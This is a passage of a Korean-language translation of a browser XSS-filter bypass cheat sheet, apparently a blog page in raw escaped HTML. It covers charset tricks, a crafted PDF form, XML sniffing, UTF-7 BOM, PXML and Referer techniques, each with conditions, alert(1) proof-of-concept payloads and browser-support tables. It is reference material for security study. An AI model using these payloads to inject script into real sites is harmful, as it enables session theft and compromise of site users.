\uac78\ub9ac\uaca0\uc9c0\ub9cc, \uc774 \uacbd\uc6b0\uc5d0\ub294 \uc6b0\ud68c\uac00 \uac00\ub2a5<br>XSS \ud544\ud130\ub294 &lt;script\/\u65e1 \ubb38\uc790\uc5f4\uc774 \ucc28\ub2e8 \uc870\uac74\uc778 &lt;sc{r}ipt.*?&gt;\uc5d0 \uc77c\uce58\ud558\uc9c0 \uc54a\ub294\ub2e4\uace0 \ud310\ub2e8\ud574 \ucc28\ub2e8\ud558\uc9c0 \uc54a\ub294\uac83\uc73c\ub85c \ucd94\uce21\ub428<\/p>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/masatokinugawa.l0.cm\/2017\/05\/xss14.html\">https:\/\/masatokinugawa.l0.cm\/2017\/05\/xss14.html<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/l0.cm\/bypass\/ie_x-chinese-cns_text.html\">https:\/\/l0.cm\/bypass\/ie_x-chinese-cns_text.html<\/a><\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;meta charset=utf-8&gt;\n&lt;script&gt;\n  document.charset=\"x-chinese-cns\";\n  location=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=&lt;script\/\u65e1alert(1)&lt;\\\/script\/\u65e1\"\n&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>(\uc18d\uc131 \uac12\uc73c\ub85c\ub9cc XSS \uacf5\uaca9) <a href=\"https:\/\/l0.cm\/bypass\/ie_x-chinese-cns_attribute.html\">https:\/\/l0.cm\/bypass\/ie_x-chinese-cns_attribute.html<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;meta charset=utf-8&gt;\n&lt;script&gt;\n  document.charset=\"x-chinese-cns\";\n  location=\"https:\/\/vulnerabledoma.in\/bypass\/attribute?q=\u4e5conmouseover=alert(1)\/\/\"\n&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>\ub2e4\ub978 \uc5b8\uc5b4\uc14b\uc5d0\uc11c\ub3c4 \uc778\ucf54\ub529\ub41c \ubb38\uc790\uc5f4\uacfc \uc2e4\uc81c \uc804\uc1a1\ub418\ub294 \ubb38\uc790\uc5f4\uc774 \ubd88\uc77c\uce58 \ud560 \uacbd\uc6b0 \uc6b0\ud68c \uac00\ub2a5<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/l0.cm\/bypass\/ie_hz_text.html\">https:\/\/l0.cm\/bypass\/ie_hz_text.html<\/a><\/li><li><a href=\"https:\/\/l0.cm\/bypass\/ie_hz_attribute.html\">https:\/\/l0.cm\/bypass\/ie_hz_attribute.html<\/a><\/li><li><a href=\"https:\/\/l0.cm\/bypass\/ie_iso2022jp_text.html\">https:\/\/l0.cm\/bypass\/ie_iso2022jp_text.html<\/a><\/li><li><a href=\"https:\/\/l0.cm\/bypass\/ie_iso2022jp_attribute.html\">https:\/\/l0.cm\/bypass\/ie_iso2022jp_attribute.html<\/a><\/li><\/ul>\n\n\n\n<p>(\uc544\ub798\ub294 \uc2dc\uc2a4\ud15c\ub85c\ucf00\uc77c\uc774 \uc77c\ubcf8\uc5b4 \ud658\uacbd\uc5d0\uc11c\ub294 \uc7ac\ud604\ub418\uc9c0\ub9cc \ub3c5\uc77c\uc5b4, \ud55c\uad6d\uc5b4 \ud658\uacbd\uc5d0\uc11c\ub294 \uc7ac\ud604\ub418\uc9c0 \uc54a\uc74c.<br>\uc0ac\uc18c\ud55c \ub3d9\uc791 \uc6d0\ub9ac\uc5d0 \ucc28\uc774\uac00 \uc788\uc744\uac83\uc73c\ub85c \uc608\uc0c1\ub418\uc9c0\ub9cc \ud655\uc2e4\ud55c \ub3d9\uc791\uc6d0\ub9ac\ub294 \uc6d0\uc800\uc790\ub3c4 \ubaa8\ub974\uaca0\ub2e4\uace0 \ud568)<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/l0.cm\/bypass\/ie_0xff_text.html\">https:\/\/l0.cm\/bypass\/ie_0xff_text.html<\/a><\/li><li><a href=\"https:\/\/l0.cm\/bypass\/ie_0xff_attribute.html\">https:\/\/l0.cm\/bypass\/ie_0xff_attribute.html<\/a><\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#adobe-acrobat-reader%E3%83%97%E3%83%A9%E3%82%B0%E3%82%A4%E3%83%B3%E3%81%AE%E5%88%A9%E7%94%A8ie%E3%81%AE%E3%81%BF\"><\/a><strike>Adobe Acrobat Reader \ud50c\ub7ec\uadf8\uc778\uc744 \uc0ac\uc6a9<\/strike><\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>POST \uba54\uc18c\ub4dc\ub97c \ud1b5\ud55c Reflected XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac <\/li><li>\uacf5\uaca9 \ud0c0\uac9f\uc774 Adobe Acrobat Reader\ub97c \uc774\uc6a9 \uac00\ub2a5 <\/li><\/ol>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/insert-script.blogspot.com\/2017\/01\/complete-internet-explorer-xss-filter.html\">https:\/\/insert-script.blogspot.com\/2017\/01\/complete-internet-explorer-xss-filter.html<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/l0.cm\/bypass\/ie_postxss_bypass.pdf\">https:\/\/l0.cm\/bypass\/ie_postxss_bypass.pdf<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>%PDF-1.1\n1 0 obj\n&lt;&lt;\n\/Type \/Catalog\n\/Outlines 2 0 R\n\/Pages 3 0 R\n\/OpenAction 33 0 R\n\/AcroForm 22 0 R\n>>\nendobj\n2 0 obj\n&lt;&lt;\n\/Type \/Outlines\n\/Count 0\n>>\nendobj\n3 0 obj\n&lt;&lt;\n\/Type \/Pages\n\/Kids [4 0 R]\n\/Count 1\n>>\nendobj\n4 0 obj\n&lt;&lt;\n\/Type \/Page\n\/Annot [ 23 0 R ]\n\/Parent 3 0 R\n\/MediaBox [0 0 612 792]\n\/Contents 5 0 R\n\/Resources &lt;&lt;\n\/ProcSet [\/PDF \/Text]\n\/Font &lt;&lt; \/F1 6 0 R >>\n>>\n>>\nendobj\n5 0 obj\n&lt;&lt; \/Length 56 >>\nstream\nBT \/F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET\nendstream\nendobj\n6 0 obj\n&lt;&lt;\n\/Type \/Font\n\/Subtype \/Type1\n\/Name \/F1\n\/BaseFont \/Helvetica\n\/Encoding \/MacRomanEncoding\n>>\nendobj\n\n33 0 obj\n&lt;&lt;\n\/S \/SubmitForm\n\/F\n        &lt;&lt;\n        % URL TO SUBMIT TO:\n        \/F (https:\/\/vulnerabledoma.in\/bypass\/text)\n        \/FS \/URL\n        >>\n% SPECIFIES THE FORMAT AND OTHER FORM RELATED CONFIGURATION\n\/Flags 6\n>>\nendobj\n\n22 0 obj\n&lt;&lt;\n    \/Fields [23 0 R]\n>>\nendobj\n23 0 obj\n&lt;&lt;\n    \/DA (\/Helv 12 Tf 0 g)\n    \/F 4\n    \/FT \/Tx\n    \/Rect [ 9.526760 680.078003 297.527008 702.078003 ]\n    \/Subtype \/Widget\n    \/Type \/Annot\n    % PARAMETER NAME\n    \/T (q)\n    % PARAMETER PAYLOAD\n    \/V (&lt;script>alert\\(1\\)&lt;\/script>)\n    \/P 4 0 R\n>>\nendobj\ntrailer\n&lt;&lt;\n\/Root 1 0 R\n>>\n<\/code><\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\ucd5c\uc2e0 Internet Explorer \uae30\uc900\uc73c\ub85c \ud574\ub2f9 \uae30\ubc95\uc740 \ud328\uce58\ub418\uc5b4 \ub354\uc774\uc0c1 \ud1b5\ud558\uc9c0 \uc54a\uc74c\uc744 \ud655\uc778\ud568<\/p><\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#xml%E3%81%B8%E3%81%AEcontent-sniffing%E3%81%AE%E5%88%A9%E7%94%A8ie%E3%81%AE%E3%81%BF\"><\/a>XML\uc744 \uc774\uc6a9\ud55c Content Sniffing<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li><code>X-Content-Type-Options:nosniff<\/code> \ud5e4\ub354\uac00 \uc788\uc9c0 \uc54a\uc74c<\/li><li>\ud398\uc774\uc9c0\uc758 \uac00\uc7a5 \uc55e\uc5d0 \ubb38\uc790\uc5f4\uc744 \uc4f8 \uc218 \uc788\uc74c<\/li><\/ol>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/twitter.com\/0x6D6172696F\/status\/753647521050849280\">https:\/\/twitter.com\/0x6D6172696F\/status\/753647521050849280<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3C?xml%20version=%221.0%22?%3E%3Cx:script%20xmlns:x=%22http:\/\/www.w3.org\/1999\/xhtml%22%3Ealert%281%26%23x29%3B%3C\/x:script%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3C?xml%20version=%221.0%22?%3E%3Cx:script%20xmlns:x=%22http:\/\/www.w3.org\/1999\/xhtml%22%3Ealert%281%26%23&#215;29%3B%3C\/x:script%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?xml version=\"1.0\"?&gt;&lt;x:script xmlns:x=\"http:\/\/www.w3.org\/1999\/xhtml\"&gt;alert(1&amp;#x29;&lt;\/x:script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#utf-7-bom%E3%81%AE%E5%88%A9%E7%94%A8ie%E3%81%AE%E3%81%BF\"><\/a>UTF-7&nbsp;<a href=\"https:\/\/en.wikipedia.org\/wiki\/UTF-7#Unicode_signature\">BOM<\/a>\uc744 \uc0ac\uc6a9<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\ud398\uc774\uc9c0\uc758 \uac00\uc7a5 \uc55e\uc5d0 \ubb38\uc790\uc5f4\uc744 \uc4f8 \uc218 \uc788\uc74c<\/li><li>+, \/, -\uc640 \uac19\uc740 \uae30\ud638\uc758 \uc0ac\uc6a9\uc774 \uac00\ub2a5<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>+\/v8, +\/v9, +\/v+, +\/v\/\ub294 UTF-7\uc758 <a href=\"https:\/\/ja.wikipedia.org\/wiki\/%E3%83%90%E3%82%A4%E3%83%88%E3%82%AA%E3%83%BC%E3%83%80%E3%83%BC%E3%83%9E%E3%83%BC%E3%82%AF\">BOM<\/a>\uc73c\ub85c \ucde8\uae09\ub428<br>IE\uc5d0\uc11c\ub294 \uc774 \ubb38\uc790\uc5f4\uc774 \ud398\uc774\uc9c0\uc758 \uac00\uc7a5 \uc55e\uc5d0 \uc788\uc744 \uacbd\uc6b0\uc5d0 \uc5b8\uc5b4\uc14b\uc744 UTF-7\uc73c\ub85c \uc778\uc2dd\ud568<br>\ud398\uc774\uc9c0\uc758 \uc5b8\uc5b4\uc14b\uc774 \uc9c0\uc815\ub41c \uacbd\uc6b0\uc5d0\ub3c4 history.back() \uc744 \uac70\uce58\uba74 \ud398\uc774\uc9c0\uc758 \uc5b8\uc5b4\uc14b\uc774 UTF-7\uc73c\ub85c \ucde8\uae09\ub428<br>(\uc774 \ub3d9\uc791\uc740 2013\ub144 7\uc6d4\uc5d0 Microsoft\uc5d0 \ubcf4\uace0\ud558\uc600\uc73c\ub098 \uc544\uc9c1 \ud328\uce58\ub418\uc9c0 \uc54a\uc74c)<\/p>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p>(\ud398\uc774\uc9c0\uc5d0 \uc5b8\uc5b4\uc14b \uc9c0\uc815\uc774 \uc5c6\ub294 \uacbd\uc6b0)<br><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%2B\/v8-%2BADw-script%2BAD4-alert(1)%2BADw-\/script%2BAD4-\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%2B\/v8-%2BADw-script%2BAD4-alert(1)%2BADw-\/script%2BAD4-<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">+\/v8-+ADw-script+AD4-alert(1)+ADw-\/script+AD4-<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>(\ud398\uc774\uc9c0\uc5d0 \uc5b8\uc5b4\uc14b \uc9c0\uc815\uc774 \uc788\ub294 \uacbd\uc6b0 )<br><a href=\"https:\/\/l0.cm\/bypass\/ie_utf7.html\">https:\/\/l0.cm\/bypass\/ie_utf7.html<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;script&gt;\nfunction go(){\n  window.open(\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%2B\/v8-%2BADw-script%2BAD4-alert(location)%2BADw-\/script%2BAD4-&amp;charset=utf-8\",\"a\");\n  setTimeout(function(){window.open(\"https:\/\/l0.cm\/h_back.html\",\"a\")},1000);\n}\n&lt;\/script&gt;\n&lt;button onclick=go()&gt;go&lt;\/button&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#pxml%E3%81%AE%E5%88%A9%E7%94%A8ie%E3%81%AE%E3%81%BF\"><\/a>&lt;?PXML&gt;\uc744 \uc0ac\uc6a9<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>Reflected XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>&lt;?PXML&gt; \ud0dc\uadf8 \uc55e\uc5d0 &lt; \uac00 <strong>2\uac1c \uc774\ud558<\/strong>\ub85c \uc874\uc7ac<\/li><li>\ud398\uc774\uc9c0\uc5d0 <a href=\"https:\/\/docs.microsoft.com\/en-us\/openspecs\/ie_standards\/ms-iedoco\/d3fffb13-31cc-4dd0-b38c-2b6aaabc153e\">document mode<\/a>\uac00 9 \uc774\ud558\ub85c \uc124\uc815\ub418\uc5b4 \uc788\uac70\ub098 \ud504\ub808\uc784\uc5d0\uc11c embed \ud0dc\uadf8 \ub4f1\uc744 \ud1b5\ud574 document mode\uac00 9 \uc774\ud558\ub85c \uc124\uc815\ub428<\/li><\/ol>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/masatokinugawa.l0.cm\/2017\/05\/xss13.html\">https:\/\/masatokinugawa.l0.cm\/2017\/05\/xss13.html<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3C?PXML%3E%3Chtml:script%3Ealert(1)%3C\/html:script%3E&amp;xuac=9\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3C?PXML%3E%3Chtml:script%3Ealert(1)%3C\/html:script%3E&amp;xuac=9<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?PXML&gt;&lt;html:script&gt;alert(1)&lt;\/html:script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3CPXML%3E%3Chtml:script%3Ealert(1)%3C\/html:script%3E&amp;xuac=9\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3CPXML%3E%3Chtml:script%3Ealert(1)%3C\/html:script%3E&amp;xuac=9<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;PXML&gt;&lt;html:script&gt;alert(1)&lt;\/html:script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E3%83%AA%E3%83%95%E3%82%A1%E3%83%A9%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>referer\ub97c \uc0ac\uc6a9<\/h3>\n\n\n\n<p>IE\/Edge\ub294 \uac19\uc740 \ub3c4\uba54\uc778(\uc11c\ube0c\ub3c4\uba54\uc778 \ud3ec\ud568) \ub610\ub294 localhost\ub85c\ubd80\ud130\uc758 Referer \ud5e4\ub354\uac00 \uc874\uc7ac\ud558\ub294 \uacbd\uc6b0, XSS \ud544\ud130\uac00 \ub3d9\uc791\ud558\uc9c0 \uc54a\uc74c.<br>\uc774\ub7ec\ud55c referer\ub97c \uc0bd\uc785\ud560 \uc218 \uc788\ub294 \uacbd\uc6b0 XSS \ud544\ud130\ub97c \uc6b0\ud68c\ud560 \uc218 \uc788\uc74c<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E5%90%8C%E3%81%98%E3%83%89%E3%83%A1%E3%82%A4%E3%83%B3%E3%82%B5%E3%83%96%E3%83%89%E3%83%A1%E3%82%A4%E3%83%B3%E3%82%82%E5%90%AB%E3%82%80%E5%86%85%E3%81%AB%E3%81%82%E3%82%8B%E3%83%AA%E3%83%B3%E3%82%AF%E6%A9%9F%E8%83%BD%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>\uac19\uc740 \ub3c4\uba54\uc778(\uc11c\ube0c\ub3c4\uba54\uc778 \ud3ec\ud568) \ub0b4\uc5d0 \uc788\ub294 \ub9c1\ud06c \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>Reflected XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uac19\uc740 \ub3c4\uba54\uc778(\uc11c\ube0c\ub3c4\uba54\uc778 \ud3ec\ud568)\uc5d0\uc11c XSS \ud398\uc774\uc9c0\ub97c \uac00\ub9ac\ud0a4\ub294 \ub9c1\ud06c\ub97c \ub9cc\ub4e4 \uc218 \uc788\uc74c<\/li><\/ol>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/vulnerabledoma.in\/bypass\/same-domain-link.html\">https:\/\/vulnerabledoma.in\/bypass\/same-domain-link.html<\/a><\/li><li><a href=\"https:\/\/www.vulnerabledoma.in\/bypass\/same-domain-link.html\">https:\/\/www.vulnerabledoma.in\/bypass\/same-domain-link.html<\/a><\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=&lt;script&gt;alert(1)&lt;\/script&gt;\"&gt;Click HERE&lt;\/a&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E4%BB%BB%E6%84%8F%E3%81%AEurl%E3%82%92%E6%8C%87%E5%AE%9A%E3%81%A7%E3%81%8D%E3%82%8B%E7%AE%87%E6%89%80%E3%81%A7%E3%81%AE%E3%83%90%E3%82%A4%E3%83%91%E3%82%B9\"><\/a>2\uc911\uc73c\ub85c \ub9c1\ud06c\ub97c \uac78\uc5b4 referer \uc0dd\uc131<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 